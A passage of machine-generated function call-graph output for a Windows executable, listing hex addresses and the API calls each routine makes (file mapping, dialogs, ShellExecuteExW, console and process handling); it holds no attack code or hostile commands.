Concurrency::cancel_current_task 28353->28489 28355 991254 28490 9911b8 28 API calls 28355->28490 28357->28287 28358->28306 28359->28306 28360->28298 28361->28277 28364 997493 28363->28364 28367 997441 28363->28367 28374 991a92 28 API calls std::_Xinvalid_argument 28364->28374 28369 99744c 28367->28369 28372 9912d3 28 API calls Concurrency::cancel_current_task 28367->28372 28369->28310 28370 997471 28373 9911b8 28 API calls 28370->28373 28372->28370 28373->28369 28376 9914bd _wcslen 28375->28376 28377 99120c 28 API calls 28376->28377 28378 9914ca 28377->28378 28379 99ed0d 28378->28379 28392 99ed1f 28379->28392 28383 9b3fea 28382->28383 28387 9b402f 28382->28387 28384 9b3fed PeekMessageW 28383->28384 28385 9b3fff GetMessageW TranslateMessage DispatchMessageW 28384->28385 28386 9b4020 WaitForSingleObject 28384->28386 28385->28386 28386->28384 28386->28387 28387->28339 28388->28316 28389->28336 28390->28342 28391->28331 28393 99ed2b __EH_prolog3_GS 28392->28393 28394 99ed38 GetFileAttributesW 28393->28394 28395 99ed46 28394->28395 28402 99edad 28394->28402 28404 9a169a 28395->28404 28396 9b5787 5 API calls 28398 99ed16 28396->28398 28398->28323 28400 99ed81 28400->28402 28461 9919a9 26 API calls 28400->28461 28401 99ed78 GetFileAttributesW 28401->28400 28402->28396 28405 9a16e0 28404->28405 28406 9a16e7 28404->28406 28408 9b5734 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 28405->28408 28407 9914a7 28 API calls 28406->28407 28410 9a16f4 28407->28410 28409 99ed68 28408->28409 28409->28400 28409->28401 28411 9a17db 28410->28411 28412 9a1711 28410->28412 28472 9a1309 28411->28472 28414 9a171b 28412->28414 28423 9a1741 28412->28423 28462 9a0ba6 28 API calls 28414->28462 28416 9a18ed 28417 9a1739 28416->28417 28485 9919a9 26 API calls 28416->28485 28420 991a66 26 API calls 28417->28420 28418 9a1729 28422 9925a4 26 API calls 28418->28422 28419 9a17fb 28419->28416 28425 9a181f 28419->28425 28426 9a1875 28419->28426 28420->28405 28424 9a1731 28422->28424 28423->28417 28463 99769f 28423->28463 28427 991a66 26 API calls 28424->28427 28481 9a0c41 28 API calls 28425->28481 28483 9a0ba6 28 API calls 28426->28483 28427->28417 28430 9a1883 28433 9925a4 26 API calls 28430->28433 28436 9a188c 28433->28436 28434 9a1838 28482 991188 28 API calls 28434->28482 28439 991a66 26 API calls 28436->28439 28438 9a179e 28471 99aef3 28 API calls 28438->28471 28442 9a1894 28439->28442 28440 9a1848 28446 9925a4 26 API calls 28440->28446 28484 9a0ddb 28 API calls 28442->28484 28443 9a17b2 28447 9925a4 26 API calls 28443->28447 28445 9a189c 28453 99769f 45 API calls 28445->28453 28448 9a1860 28446->28448 28449 9a17be 28447->28449 28450 991a66 26 API calls 28448->28450 28451 991a66 26 API calls 28449->28451 28452 9a1868 28450->28452 28454 9a17c6 28451->28454 28455 991a66 26 API calls 28452->28455 28457 9a1870 28453->28457 28456 991a66 26 API calls 28454->28456 28455->28457 28458 9a17ce 28456->28458 28460 991a66 26 API calls 28457->28460 28459 991a66 26 API calls 28458->28459 28459->28417 28460->28416 28461->28402 28462->28418 28464 9976bb 28463->28464 28465 9976e1 28463->28465 28468 99120c 28 API calls 28464->28468 28486 9958cb 45 API calls 28465->28486 28469 9976db 28468->28469 28470 9a0bf3 28 API calls _wcslen 28469->28470 28470->28438 28471->28443 28487 9b57a5 28472->28487 28474 9a1315 GetCurrentDirectoryW 28475 9a1327 28474->28475 28478 9a1323 28474->28478 28488 991bbd 28 API calls 28475->28488 28477 9a1339 GetCurrentDirectoryW 28479 9a1356 _wcslen 28477->28479 28478->28419 28479->28478 28480 9912a7 26 API calls 28479->28480 28480->28478 28481->28434 28482->28440 28483->28430 28484->28445 28485->28417 28487->28474 28488->28477 28489->28355 28490->28357 28492 99e0b0 28493 99e0c9 28492->28493 28498 99e850 28493->28498 28495 99e0fb 28497 99e850 111 API calls 28497->28495 28500 99e862 28498->28500 28501 99e875 28498->28501 28499 99e0cd 28499->28497 28500->28499 28507 999490 109 API calls 28500->28507 28501->28499 28503 99e888 SetFilePointer 28501->28503 28503->28499 28504 99e8a4 GetLastError 28503->28504 28504->28499 28505 99e8ae 28504->28505 28505->28499 28508 999490 109 API calls 28505->28508 28507->28501 28508->28499 28509 9b6452 28510 9b645e ___scrt_is_nonwritable_in_current_image 28509->28510 28541 9b5e63 28510->28541 28512 9b6465 28513 9b65b8 28512->28513 28516 9b648f 28512->28516 28644 9b6878 4 API calls 2 library calls 28513->28644 28515 9b65bf 28637 9bee14 28515->28637 28528 9b64ce ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 28516->28528 28552 9bf9ad 28516->28552 28523 9b64ae 28525 9b652f 28560 9b6993 GetStartupInfoW __cftof 28525->28560 28527 9b6535 28561 9bf8fe 51 API calls 28527->28561 28528->28525 28640 9be9b0 38 API calls _abort 28528->28640 28530 9b653d 28562 9b454a 28530->28562 28535 9b6551 28535->28515 28536 9b6555 28535->28536 28537 9b655e 28536->28537 28642 9bedb7 28 API calls _abort 28536->28642 28643 9b5fd4 12 API calls ___scrt_uninitialize_crt 28537->28643 28540 9b6566 28540->28523 28542 9b5e6c 28541->28542 28646 9b6694 IsProcessorFeaturePresent 28542->28646 28544 9b5e78 28647 9b96d9 10 API calls 2 library calls 28544->28647 28546 9b5e7d 28551 9b5e81 28546->28551 28648 9bf837 28546->28648 28549 9b5e98 28549->28512 28551->28512 28554 9bf9c4 28552->28554 28553 9b5734 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 28555 9b64a8 28553->28555 28554->28553 28555->28523 28556 9bf951 28555->28556 28557 9bf980 28556->28557 28558 9b5734 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 28557->28558 28559 9bf9a9 28558->28559 28559->28528 28560->28527 28561->28530 28715 9a6d7b 28562->28715 28565 9a1309 30 API calls 28566 9b4572 28565->28566 28797 9af4d4 28566->28797 28568 9b457b __cftof 28801 9af89a 28568->28801 28570 9b45fc 28810 9af84c 28570->28810 28572 9b4608 GetCommandLineW 28573 9b46f9 28572->28573 28574 9b4618 28572->28574 28575 9a13f9 29 API calls 28573->28575 28576 9914a7 28 API calls 28574->28576 28577 9b4703 28575->28577 28578 9b4622 28576->28578 28579 9925a4 26 API calls 28577->28579 28580 9b19ee 115 API calls 28578->28580 28581 9b4710 28579->28581 28582 9b462c 28580->28582 28583 991a66 26 API calls 28581->28583 28584 991a66 26 API calls 28582->28584 28585 9b4719 SetEnvironmentVariableW GetLocalTime 28583->28585 28586 9b4635 28584->28586 28590 99f6ba _swprintf 51 API calls 28585->28590 28588 9b46dc 28586->28588 28589 9b4642 OpenFileMappingW 28586->28589 28591 9914a7 28 API calls 28588->28591 28592 9b465b MapViewOfFile 28589->28592 28593 9b46d2 CloseHandle 28589->28593 28595 9b477e SetEnvironmentVariableW GetModuleHandleW LoadIconW 28590->28595 28596 9b46e6 28591->28596 28592->28593 28594 9b466b UnmapViewOfFile MapViewOfFile 28592->28594 28593->28573 28594->28593 28598 9b4689 28594->28598 28599 9b07e5 34 API calls 28595->28599 28597 9b3efc 30 API calls 28596->28597 28600 9b46f0 28597->28600 28601 9afc38 28 API calls 28598->28601 28602 9b47bc 28599->28602 28604 991a66 26 API calls 28600->28604 28605 9b4699 28601->28605 28603 9a3538 133 API calls 28602->28603 28606 9b47cc 28603->28606 28604->28573 28607 9b3efc 30 API calls 28605->28607 28608 9ad255 28 API calls 28606->28608 28609 9b46a2 28607->28609 28610 9b47d8 28608->28610 28611 9a5109 114 API calls 28609->28611 28612 9ad255 28 API calls 28610->28612 28613 9b46b5 28611->28613 28614 9b47e1 DialogBoxParamW 28612->28614 28615 9a51bf 114 API calls 28613->28615 28616 9ad347 26 API calls 28614->28616 28617 9b46c0 28615->28617 28618 9b481e 28616->28618 28620 9b46cb UnmapViewOfFile 28617->28620 28619 9ad347 26 API calls 28618->28619 28621 9b482a 28619->28621 28620->28593 28622 9b483a 28621->28622 28623 9b4833 Sleep 28621->28623 28624 9b4848 28622->28624 28625 9afb4b 48 API calls 28622->28625 28623->28622 28626 9b4852 DeleteObject 28624->28626 28625->28624 28627 9b486e 28626->28627 28628 9b4867 DeleteObject 28626->28628 28629 9b489e 28627->28629 28630 9b48b0 28627->28630 28628->28627 28631 9b3fcf 6 API calls 28629->28631 28632 9af53a GdiplusShutdown CoUninitialize 28630->28632 28633 9b48a4 CloseHandle 28631->28633 28634 9b48ea 28632->28634 28633->28630 28635 9b5734 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 28634->28635 28636 9b48fd 28635->28636 28641 9b69c9 GetModuleHandleW 28636->28641 28931 9beb91 28637->28931 28640->28525 28641->28535 28642->28537 28643->28540 28644->28515 28646->28544 28647->28546 28652 9c2d0a 28648->28652 28651 9b96f8 7 API calls 2 library calls 28651->28551 28655 9c2d27 28652->28655 28656 9c2d23 28652->28656 28653 9b5734 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 28654 9b5e8a 28653->28654 28654->28549 28654->28651 28655->28656 28658 9c1320 28655->28658 28656->28653 28659 9c132c ___scrt_is_nonwritable_in_current_image 28658->28659 28670 9c18e1 EnterCriticalSection 28659->28670 28661 9c1333 28671 9c31d8 28661->28671 28663 9c1342 28669 9c1351 28663->28669 28684 9c11b0 29 API calls 28663->28684 28666 9c134c 28685 9c1266 GetStdHandle GetFileType 28666->28685 28667 9c1362 _abort 28667->28655 28686 9c136d LeaveCriticalSection _abort 28669->28686 28670->28661 28672 9c31e4 ___scrt_is_nonwritable_in_current_image 28671->28672 28673 9c3208 28672->28673 28674 9c31f1 28672->28674 28687 9c18e1 EnterCriticalSection 28673->28687 28695 9c01d3 20 API calls _abort 28674->28695 28677 9c31f6 28696 9bac8e 26 API calls _abort 28677->28696 28679 9c3240 28697 9c3267 LeaveCriticalSection _abort 28679->28697 28680 9c3200 _abort 28680->28663 28681 9c3214 28681->28679 28688 9c3129 28681->28688 28684->28666 28685->28669 28686->28667 28687->28681 28698 9c1de6 28688->28698 28690 9c3148 28705 9c03d4 28690->28705 28691 9c313b 28691->28690 28711 9c1bba 11 API calls 2 library calls 28691->28711 28694 9c319a 28694->28681 28695->28677 28696->28680 28697->28680 28703 9c1df3 _abort 28698->28703 28699 9c1e1e RtlAllocateHeap 28701 9c1e31 28699->28701 28699->28703 28700 9c1e33 28713 9c01d3 20 API calls _abort 28700->28713 28701->28691 28703->28699 28703->28700 28712 9be91a 7 API calls 2 library calls 28703->28712 28706 9c0408 __dosmaperr 28705->28706 28707 9c03df RtlFreeHeap 28705->28707 28706->28694 28707->28706 28708 9c03f4 28707->28708 28714 9c01d3 20 API calls _abort 28708->28714 28710 9c03fa GetLastError 28710->28706 28711->28691 28712->28703 28713->28701 28714->28710 28817 9b5b20 28715->28817 28718 9a6e28 28720 9a719b 28718->28720 28867 9be50e 42 API calls 2 library calls 28718->28867 28719 9a6dd3 GetProcAddress 28721 9a6dfd GetProcAddress 28719->28721 28722 9a6de5 28719->28722 28819 9a13f9 28720->28819 28721->28718 28723 9a6e0f 28721->28723 28722->28721 28723->28718 28726 9a7098 28726->28720 28729 9a13f9 29 API calls 28726->28729 28727 9a71a6 28830 9a2117 28727->28830 28730 9a70ac 28729->28730 28731 9a70ba 28730->28731 28732 9a70bd CreateFileW 28730->28732 28731->28732 28734 9a70db SetFilePointer 28732->28734 28735 9a7186 CloseHandle 28732->28735 28734->28735 28736 9a70ed ReadFile 28734->28736 28737 991a66 26 API calls 28735->28737 28736->28735 28738 9a7109 28736->28738 28739 9a7199 28737->28739 28741 9a711a 28738->28741 28742 9a73f2 28738->28742 28739->28720 28740 9914a7 28 API calls 28752 9a71ba 28740->28752 28744 9914a7 28 API calls 28741->28744 28873 9b5ce1 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess IsProcessorFeaturePresent 28742->28873 28753 9a7133 28744->28753 28747 9a73f7 28748 9a71de CompareStringW 28748->28752 28749 991a66 26 API calls 28749->28752 28750 9a7248 28763 9914a7 28 API calls 28750->28763 28768 9a229d 45 API calls 28750->28768 28775 991a66 26 API calls 28750->28775 28781 99ed1f 49 API calls 28750->28781 28786 9a7292 28750->28786 28752->28740 28752->28748 28752->28749 28752->28750 28754 99ed1f 49 API calls 28752->28754 28834 9a067e 28752->28834 28839 9a6c5e 28752->28839 28863 9a229d 28752->28863 28755 9a7176 28753->28755 28759 9a6c5e 30 API calls 28753->28759 28868 9a6366 28753->28868 28754->28752 28758 991a66 26 API calls 28755->28758 28756 9a729e 28872 9a2187 45 API calls 28756->28872 28757 9a73bd 28761 991a66 26 API calls 28757->28761 28762 9a717e 28758->28762 28759->28753 28765 9a73c5 28761->28765 28766 991a66 26 API calls 28762->28766 28763->28750 28764 9a72a7 28769 9a067e 6 API calls 28764->28769 28767 991a66 26 API calls 28765->28767 28766->28735 28770 9a73cd 28767->28770 28768->28750 28771 9a72ac 28769->28771 28774 9b5734 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 28770->28774 28772 9a7332 28771->28772 28773 9a72b3 28771->28773 28777 9a6a25 53 API calls 28772->28777 28776 9a6c5e 30 API calls 28773->28776 28778 9a73e8 28774->28778 28775->28750 28779 9a72bd 28776->28779 28780 9a735b AllocConsole 28777->28780 28778->28565 28782 9a6c5e 30 API calls 28779->28782 28783 9a7368 GetCurrentProcessId AttachConsole 28780->28783 28796 9a7310 28780->28796 28781->28750 28784 9a72c7 28782->28784 28785 9a7383 28783->28785 28787 9a4318 53 API calls 28784->28787 28791 9a738c GetStdHandle WriteConsoleW Sleep FreeConsole 28785->28791 28786->28756 28786->28757 28788 9a72ec 28787->28788 28790 9a6a25 53 API calls 28788->28790 28789 9a73b5 ExitProcess 28792 9a72f6 28790->28792 28791->28796 28793 9a4318 53 API calls 28792->28793 28794 9a7307 28793->28794 28795 9914a7 28 API calls 28794->28795 28795->28796 28796->28789 28798 9a6c5e 30 API calls 28797->28798 28799 9af4e8 OleInitialize 28798->28799 28800 9af50b GdiplusStartup SHGetMalloc 28799->28800 28800->28568 28802 9925a4 26 API calls 28801->28802 28803 9af8a8 28802->28803 28804 9925a4 26 API calls 28803->28804 28805 9af8b4 28804->28805 28806 9925a4 26 API calls 28805->28806 28807 9af8c0 28806->28807 28808 9925a4 26 API calls 28807->28808 28809 9af8cc 28808->28809 28809->28570 28809->28809 28811 991a66 26 API calls 28810->28811 28812 9af857 28811->28812 28813 991a66 26 API calls 28812->28813 28814 9af85f 28813->28814 28815 991a66 26 API calls 28814->28815 28816 9af867 28815->28816 28818 9a6d8d GetModuleHandleW 28817->28818 28818->28718 28818->28719 28820 9a1405 __EH_prolog3 28819->28820 28874 9b56f6 28820->28874 28822 9a1431 GetModuleFileNameW 28823 9a140f 28822->28823 28824 9a1463 28822->28824 28823->28822 28823->28824 28888 991be3 28823->28888 28825 9914a7 28 API calls 28824->28825 28827 9a146c 28825->28827 28828 9a147f 28827->28828 28829 9912a7 26 API calls 28827->28829 28828->28727 28829->28828 28831 9a2124 28830->28831 28832 99769f 45 API calls 28831->28832 28833 9a2136 28832->28833 28833->28752 28835 9a06a4 GetVersionExW 28834->28835 28836 9a06d1 28834->28836 28835->28836 28837 9b5734 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 28836->28837 28838 9a06fa 28837->28838 28838->28752 28840 9a6c6a __EH_prolog3_GS 28839->28840 28841 9b56f6 28 API calls 28840->28841 28842 9a6c77 28841->28842 28843 9a6c8d GetSystemDirectoryW 28842->28843 28844 9a6cab 28843->28844 28861 9a6ca4 28843->28861 28845 9914a7 28 API calls 28844->28845 28847 9a6ccd 28845->28847 28846 9a6d71 28849 9b5787 5 API calls 28846->28849 28850 9914a7 28 API calls 28847->28850 28848 9912a7 26 API calls 28848->28846 28851 9a6d78 28849->28851 28852 9a6cda 28850->28852 28851->28752 28906 9a1ad1 28852->28906 28855 991a66 26 API calls 28856 9a6cf7 28855->28856 28857 991a66 26 API calls 28856->28857 28858 9a6cff LoadLibraryW 28857->28858 28860 9a6d1c 28858->28860 28858->28861 28860->28861 28916 9919a9 26 API calls 28860->28916 28861->28846 28861->28848 28864 9a22a6 28863->28864 28918 9a236c 28864->28918 28867->28726 28871 9a6380 28868->28871 28869 9a63b7 28869->28753 28870 991b63 28 API calls 28870->28871 28871->28869 28871->28870 28872->28764 28873->28747 28876 9b56fb 28874->28876 28877 9b5715 28876->28877 28879 9b5717 28876->28879 28892 9bd08c 28876->28892 28902 9be91a 7 API calls 2 library calls 28876->28902 28877->28823 28880 991a25 Concurrency::cancel_current_task 28879->28880 28882 9b5721 28879->28882 28899 9b734a 28880->28899 28884 9b734a CallUnexpected RaiseException 28882->28884 28883 991a41 28886 991a5a 28883->28886 28887 9912a7 26 API calls 28883->28887 28885 9b6628 28884->28885 28886->28823 28887->28886 28889 991c03 28888->28889 28891 991bfb 28888->28891 28889->28891 28905 991c33 28 API calls 28889->28905 28891->28823 28897 9c040e _abort 28892->28897 28893 9c044c 28904 9c01d3 20 API calls _abort 28893->28904 28894 9c0437 RtlAllocateHeap 28896 9c044a 28894->28896 28894->28897 28896->28876 28897->28893 28897->28894 28903 9be91a 7 API calls 2 library calls 28897->28903 28900 9b7391 RaiseException 28899->28900 28901 9b7364 28899->28901 28900->28883 28901->28900 28902->28876 28903->28897 28904->28896 28905->28891 28907 9a1add __EH_prolog3_GS 28906->28907 28908 997673 28 API calls 28907->28908 28909 9a1aef 28908->28909 28911 9a1b0c 28909->28911 28917 9a0ddb 28 API calls 28909->28917 28912 991a66 26 API calls 28911->28912 28913 9a1b35 28912->28913 28914 9b5787 5 API calls 28913->28914 28915 9a1b3a 28914->28915 28915->28855 28916->28861 28917->28911 28919 9a2378 28918->28919 28922 9a238e 28919->28922 28921 9a22b6 28921->28752 28923 9a24e5 28922->28923 28926 9a23a4 28922->28926 28930 9958cb 45 API calls 28923->28930 28928 9a23bc 28926->28928 28929 9a0c7f 28 API calls 28926->28929 28928->28921 28929->28928 28932 9beb9d _abort 28931->28932 28933 9bebb6 28932->28933 28934 9beba4 28932->28934 28955 9c18e1 EnterCriticalSection 28933->28955 28967 9beceb GetModuleHandleW 28934->28967 28937 9beba9 28937->28933 28968 9bed2f GetModuleHandleExW 28937->28968 28938 9bebbd 28941 9bec32 28938->28941 28954 9bec5b 28938->28954 28976 9bf6a0 20 API calls _abort 28938->28976 28944 9bec4a 28941->28944 28950 9bf951 _abort 5 API calls 28941->28950 28951 9bf951 _abort 5 API calls 28944->28951 28945 9bec78 28959 9becaa 28945->28959 28946 9beca4 28977 9c8fc0 5 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 28946->28977 28950->28944 28951->28954 28956 9bec9b 28954->28956 28955->28938 28978 9c1931 LeaveCriticalSection 28956->28978 28958 9bec74 28958->28945 28958->28946 28979 9c1d26 28959->28979 28962 9becd8 28965 9bed2f _abort 8 API calls 28962->28965 28963 9becb8 GetPEB 28963->28962 28964 9becc8 GetCurrentProcess TerminateProcess 28963->28964 28964->28962 28966 9bece0 ExitProcess 28965->28966 28967->28937 28969 9bed59 GetProcAddress 28968->28969 28970 9bed7c 28968->28970 28971 9bed6e 28969->28971 28972 9bed8b 28970->28972 28973 9bed82 FreeLibrary 28970->28973 28971->28970 28974 9b5734 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 28972->28974 28973->28972 28975 9bebb5 28974->28975 28975->28933 28976->28941 28978->28958 28980 9c1d4b 28979->28980 28981 9c1d41 28979->28981 28986 9c1948 5 API calls _abort 28980->28986 28984 9b5734 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 28981->28984 28983 9c1d62 28983->28981 28985 9becb4 28984->28985 28985->28962 28985->28963 28986->28983 28987 99e3d5 28993 99e3df 28987->28993 28988 9b5734 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 28989 99e481 28988->28989 28990 99e551 SetFilePointer 28991 99e403 28990->28991 28992 99e56e GetLastError 28990->28992 28991->28988 28992->28991 28993->28990 28993->28991 28994 9b4b8a 28995 9b4b33 28994->28995 28995->28994 28996 9b4fce ___delayLoadHelper2@8 17 API calls 28995->28996 28996->28995 29000 9b5680 29001 9b5696 _com_error::_com_error 29000->29001 29002 9b734a CallUnexpected RaiseException 29001->29002 29003 9b56a4 29002->29003 29004 9b4fce ___delayLoadHelper2@8 17 API calls 29003->29004 29005 9b56bc 29004->29005 29006 9b0900 29007 9b090f __EH_prolog3_catch_GS 29006->29007 29252 991e44 29007->29252 29010 9b125b 29368 9b3796 29010->29368 29011 9b0940 29016 9b0951 29011->29016 29017 9b0a20 29011->29017 29059 9b095f 29011->29059 29021 9b095a 29016->29021 29022 9b09fc 29016->29022 29018 9b0ab0 29017->29018 29025 9b0a36 29017->29025 29262 991ce2 29018->29262 29019 9b127b SendMessageW 29020 9b128a 29019->29020 29026 9b12a3 GetDlgItem SendMessageW 29020->29026 29027 9b1293 SendDlgItemMessageW 29020->29027 29028 9a4318 53 API calls 29021->29028 29021->29059 29024 9b0a15 EndDialog 29022->29024 29022->29059 29024->29059 29030 9a4318 53 API calls 29025->29030 29031 9a1309 30 API calls 29026->29031 29027->29026 29032 9b098d 29028->29032 29033 9b0a53 SetDlgItemTextW 29030->29033 29034 9b12e3 GetDlgItem 29031->29034 29415 991900 29 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 29032->29415 29038 9b0a5f 29033->29038 29035 9b1302 29034->29035 29387 991e05 29035->29387 29037 9b0b01 GetDlgItem 29042 9b0b38 SetFocus 29037->29042 29043 9b0b15 SendMessageW SendMessageW 29037->29043 29047 9b0a68 GetMessageW 29038->29047 29038->29059 29040 9b0994 29045 9b09a4 29040->29045 29051 991de7 SetDlgItemTextW 29040->29051 29048 9b0b48 29042->29048 29049 9b0b6f 29042->29049 29043->29042 29044 9b130c 29390 9af2ce GetClassNameW 29044->29390 29045->29059 29416 9919a9 26 API calls 29045->29416 29046 9b0ae4 29056 991a66 26 API calls 29046->29056 29053 9b0a7f IsDialogMessageW 29047->29053 29047->29059 29055 9a4318 53 API calls 29048->29055 29052 997673 28 API calls 29049->29052 29051->29045 29058 9b0b7b 29052->29058 29053->29038 29060 9b0a8e TranslateMessage DispatchMessageW 29053->29060 29054 9b113a 29061 9a4318 53 API calls 29054->29061 29062 9b0b52 29055->29062 29056->29059 29434 9b34eb 28 API calls __EH_prolog3_GS 29058->29434 29417 9b5796 29059->29417 29060->29038 29067 9b114b SetDlgItemTextW 29061->29067 29063 9914a7 28 API calls 29062->29063 29069 9b0b5b 29063->29069 29068 9b1160 29067->29068 29073 9a4318 53 API calls 29068->29073 29420 9b3572 29069->29420 29071 9b0b88 29076 9a4318 53 API calls 29071->29076 29077 9b117e 29073->29077 29074 9b0b6a 29081 991a66 26 API calls 29074->29081 29075 9b1346 29080 9b1377 29075->29080 29084 9a4318 53 API calls 29075->29084 29079 9b0b9f 29076->29079 29082 9914a7 28 API calls 29077->29082 29078 9b1d4f 48 API calls 29078->29075 29083 9a6a25 53 API calls 29079->29083 29085 9b1d4f 48 API calls 29080->29085 29177 9b1490 29080->29177 29086 9b0bce 29081->29086 29087 9b1187 29082->29087 29089 9b0ba9 29083->29089 29090 9b1359 SetDlgItemTextW 29084->29090 29092 9b138d 29085->29092 29093 9b0be0 29086->29093 29435 9b3d64 26 API calls __EH_prolog3_GS 29086->29435 29094 9b11f5 29087->29094 29107 9914a7 28 API calls 29087->29107 29088 9b1595 29101 9b15ad 29088->29101 29102 9b15a0 EnableWindow 29088->29102 29095 9b3572 21 API calls 29089->29095 29091 9a4318 53 API calls 29090->29091 29097 9b136d SetDlgItemTextW 29091->29097 29113 9b13ad 29092->29113 29132 9b13ce 29092->29132 29100 9b0c07 29093->29100 29116 99ed0d 49 API calls 29093->29116 29099 9a4318 53 API calls 29094->29099 29096 9b0bbb 29095->29096 29105 991a66 26 API calls 29096->29105 29097->29080 29106 9b11ff 29099->29106 29276 99eaf3 29100->29276 29104 9b15c8 29101->29104 29452 991cc4 GetDlgItem KiUserCallbackDispatcher 29101->29452 29102->29101 29112 9b15f0 29104->29112 29129 9b15e8 SendMessageW 29104->29129 29105->29074 29114 9914a7 28 API calls 29106->29114 29115 9b11a6 29107->29115 29108 9b147c 29117 9b1d4f 48 API calls 29108->29117 29111 9b1560 29451 9ae265 34 API calls __EH_prolog3_GS 29111->29451 29112->29046 29130 9a4318 53 API calls 29112->29130 29449 9ae265 34 API calls __EH_prolog3_GS 29113->29449 29121 9b120b 29114->29121 29124 9a4318 53 API calls 29115->29124 29125 9b0bfd 29116->29125 29117->29177 29118 9b0c20 GetLastError 29119 9b0c2b 29118->29119 29286 9a2226 29119->29286 29135 9914a7 28 API calls 29121->29135 29122 9b15bf 29453 991cc4 GetDlgItem KiUserCallbackDispatcher 29122->29453 29147 9b11b6 29124->29147 29125->29100 29131 9b0c01 29125->29131 29129->29112 29137 9b1609 SetDlgItemTextW 29130->29137 29436 9afa79 25 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 29131->29436 29132->29108 29139 9b1d4f 48 API calls 29132->29139 29133 9b0c40 29140 9b0c4c GetLastError 29133->29140 29141 9b0c5d 29133->29141 29134 9b1587 29142 991a66 26 API calls 29134->29142 29143 9b1224 29135->29143 29136 9914a7 28 API calls 29136->29177 29137->29046 29144 9b1405 29139->29144 29140->29141 29149 9b0c79 GetTickCount 29141->29149 29150 9b0d0f 29141->29150 29214 9b0cfd 29141->29214 29145 9b1593 29142->29145 29155 991a66 26 API calls 29143->29155 29144->29108 29148 9b140e DialogBoxParamW 29144->29148 29145->29088 29146 9a4318 53 API calls 29146->29177 29158 991a66 26 API calls 29147->29158 29148->29108 29153 9b142c EndDialog 29148->29153 29289 99325c 29149->29289 29152 9b0f94 29150->29152 29157 9a13f9 29 API calls 29150->29157 29151 9b1046 29321 991e1f GetDlgItem ShowWindow 29151->29321 29163 9b0acb EndDialog 29152->29163 29447 999733 28 API calls _wcslen 29152->29447 29153->29059 29159 9b1448 29153->29159 29161 9b1243 29155->29161 29165 9b0d39 29157->29165 29166 9b11e9 29158->29166 29159->29059 29450 9919a9 26 API calls 29159->29450 29168 991a66 26 API calls 29161->29168 29162 9b105b 29322 991e1f GetDlgItem ShowWindow 29162->29322 29163->29046 29437 9a505a 114 API calls 29165->29437 29172 991a66 26 API calls 29166->29172 29175 9b124e 29168->29175 29170 9b0fae 29182 9a4318 53 API calls 29170->29182 29172->29094 29174 9b0c9f 29178 991a66 26 API calls 29174->29178 29179 991a66 26 API calls 29175->29179 29176 9b1064 29180 9a4318 53 API calls 29176->29180 29177->29088 29177->29111 29177->29136 29177->29146 29187 991a66 26 API calls 29177->29187 29184 9b0cab 29178->29184 29179->29046 29181 9b106e SetDlgItemTextW 29180->29181 29323 991e1f GetDlgItem ShowWindow 29181->29323 29186 9b0fd4 29182->29186 29183 9b0d51 29188 9a6a25 53 API calls 29183->29188 29299 99de9a 29184->29299 29193 991a66 26 API calls 29186->29193 29187->29177 29201 9b0d80 GetCommandLineW 29188->29201 29189 9b1082 SetDlgItemTextW GetDlgItem 29191 9b109f GetWindowLongW SetWindowLongW 29189->29191 29192 9b10b7 29189->29192 29191->29192 29324 9b1d4f 29192->29324 29196 9b0fea 29193->29196 29200 991a66 26 API calls 29196->29200 29197 9b0ce0 29312 99ddc7 29197->29312 29198 9b0cd5 GetLastError 29198->29197 29205 9b0ff6 29200->29205 29209 9b0e05 _wcslen 29201->29209 29204 9b1d4f 48 API calls 29207 9b10ce 29204->29207 29216 9a4318 53 API calls 29205->29216 29354 9b3c78 29207->29354 29438 9b0405 5 API calls 2 library calls 29209->29438 29211 991a66 26 API calls 29211->29214 29213 9b0e23 29439 9b0405 5 API calls 2 library calls 29213->29439 29214->29150 29214->29151 29215 9b1d4f 48 API calls 29226 9b10ef 29215->29226 29218 9b100c 29216->29218 29221 9914a7 28 API calls 29218->29221 29219 9b0e2f 29440 9b0405 5 API calls 2 library calls 29219->29440 29220 9b1110 29448 991cc4 GetDlgItem KiUserCallbackDispatcher 29220->29448 29224 9b1015 29221->29224 29231 991a66 26 API calls 29224->29231 29225 9b0e3b 29441 9a5109 114 API calls 29225->29441 29226->29220 29229 9b1d4f 48 API calls 29226->29229 29227 9b0af5 29227->29054 29227->29163 29229->29220 29230 9b0e4e 29442 9b3e53 28 API calls __EH_prolog3 29230->29442 29234 9b1031 29231->29234 29233 9b0e6b CreateFileMappingW 29235 9b0e9d MapViewOfFile 29233->29235 29236 9b0ed5 ShellExecuteExW 29233->29236 29237 991a66 26 API calls 29234->29237 29238 9b0ed2 __InternalCxxFrameHandler 29235->29238 29239 9b0ef3 29236->29239 29237->29163 29238->29236 29240 9b0f3d 29239->29240 29241 9b0f00 WaitForInputIdle 29239->29241 29244 9b0f73 29240->29244 29245 9b0f60 UnmapViewOfFile CloseHandle 29240->29245 29242 9b0f1e 29241->29242 29242->29240 29243 9b0f23 Sleep 29242->29243 29243->29240 29243->29242 29443 992e8b 29244->29443 29245->29244 29248 991a66 26 API calls 29249 9b0f83 29248->29249 29250 991a66 26 API calls 29249->29250 29251 9b0f8e 29250->29251 29251->29152 29253 991e4d 29252->29253 29254 991ea6 29252->29254 29256 991eb3 29253->29256 29454 9a3eaa 64 API calls 3 library calls 29253->29454 29455 9a3e83 GetWindowLongW SetWindowLongW 29254->29455 29256->29010 29256->29011 29256->29059 29258 991e6f 29258->29256 29259 991e82 GetDlgItem 29258->29259 29259->29256 29260 991e92 29259->29260 29260->29256 29261 991e98 SetWindowTextW 29260->29261 29261->29256 29456 